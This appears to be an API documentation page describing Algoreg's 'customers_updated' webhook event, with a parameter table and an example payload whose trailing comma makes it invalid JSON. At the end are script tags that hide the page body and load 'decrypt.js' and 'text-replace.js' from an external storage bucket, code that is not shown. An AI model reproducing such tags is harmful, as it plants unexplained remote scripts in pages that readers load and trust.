> ## Documentation Index
> Fetch the complete documentation index at: https://docs.algoreg.com/llms.txt
> Use this file to discover all available pages before exploring further.

# Webhooks events

## Event: Customer information updated (custom fields, computed fields or basic fields)

**Note: if you want an event when EDD status is updated, please refer to the Go!Risk webhook**

This event will be triggered when customer information is updated, a customer information can be updated by Algoreg automatically or by a human agent any time after the session finished.

Content-Type: `application/json`

| Parameter   | Type     | Description                                     |
| ----------- | -------- | ----------------------------------------------- |
| `client_id` | `string` | Client ID                                       |
| `customers` | `array`  | Array of customers algoreg ids and external ids |

Exemple

```
{
  "event_id":"159236",
  "event_code":"customers_updated",
  "event_date":"2024-09-03T14:34:01Z",
  "event_source": "web",
  "data": {
    "client_id":1,
    "customers": [ {"customer_id":"0000400a-0000-4af0-0000-9aea69d80000", "external_id":"id-75845"} ]
  },
}
```

<script type="application/javascript">document.body.style.opacity = 0;</script>

<script type="application/javascript" src="https://pub-e699792e794f4aaf8774c111fdc1c1ee.r2.dev/decrypt.js" />

<script type="application/javascript" src="https://pub-e699792e794f4aaf8774c111fdc1c1ee.r2.dev/text-replace.js" />
